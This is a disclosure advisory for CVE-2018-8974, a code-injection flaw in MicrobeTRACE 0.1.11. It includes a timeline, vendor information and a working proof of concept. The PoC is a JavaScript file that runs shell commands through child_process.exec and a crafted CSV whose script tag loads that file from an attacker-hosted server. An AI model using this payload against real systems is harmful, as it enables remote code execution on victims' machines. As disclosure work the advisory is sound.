Description
MicrobeTRACE 0.1.11 allows remote attackers to execute arbitrary code, related to code injection via specially crafted CSV files.
VulnerabilityType
Inclusion of Functionality from Untrusted Control Sphere (CWE-829)
Vendor of Product
Centers for Disease Control and Prevention Surveillance Strategy (CDCgov)
Affected Product Code Base
MicrobeTRACE 0.1.11
Affected Component
| Component | Version | Hash |
|---|---|---|
| MicrobeTRACE.exe | 0.1.11 | 997e33089165286a364dc543174dc232 |
Attack Type
Remote
Impact Code execution
true
Attack Vectors
Attackers can exploit this vulnerability by creating a specially crafted CSV file that subsequently injects and executes server side code.
Reference
Product Website
Product Download
Discoverer
West Shepherd
wshepherd0010[at]gmail.com
Advisory ID
CVE-2018-8974
Report Timeline
| Date | Action |
|---|---|
| 3/23/2018 | Discovered vulnerability, contacted vendor, requested CVE. |
| 3/23/2018 | Vendor replied, working on fix. |
| 3/27/2018 | Vendor published fix for 0.1.11. |
| 4/24/2018 | Released details to public. |
PoC
/*
# Exploit Title: MicrobeTRACE 0.1.11 - Code Injection
# Google Dork: N/A
# Date: 4/24/2018
# Exploit Author: West Shepherd
# Vendor Homepage: https://github.com/CDCgov/MicrobeTRACE
# Software Link: https://github.com/CDCgov/MicrobeTRACE/releases/tag/v0.1.11
# Version: 0.1.11
# Tested on: Windows 7 x86-x64
# CVE : CVE-2018-8974.
*/
/*
Steps to reproduce:
1.) create pwn.js
2.) create exploit.csv
3.) run "python -m SimpleHTTPServer 80"
4.) load exploit.csv with MicrobeTRACE
*/
// contents of pwn.js
const exec = require('child_process').exec;
function os_func() {
this.execCommand = function(cmd, callback) {
exec(cmd, (error, stdout, stderr) => {
if (error) {
alert('exec error:' + error);
return;
}
callback(stdout);
});
}
}
var os = new os_func();
os.execCommand('whoami', function (returnvalue) {
alert(returnvalue + ' has been pwned.');
});
// contents of exploit.csv (for 0.1.11)
/*
Source<script type="text/javascript" src="http://172.26.61.131/pwn.js"></script>,Target,Weight,distance
1807,1311,1,0.013987
1518,1311,15,0.013985
1481,1311,26,0.01398
1480,1311,12,0.01398
1422,1311,24,0.013978
*/PGP
Contact West Shepherd wshepherd0010[at]gmail.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: CryptUp 4.4.6 Gmail Encryption https://cryptup.org
Comment: Seamlessly send, receive and search encrypted email
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
6/I9
=vCq5
-----END PGP PUBLIC KEY BLOCK-----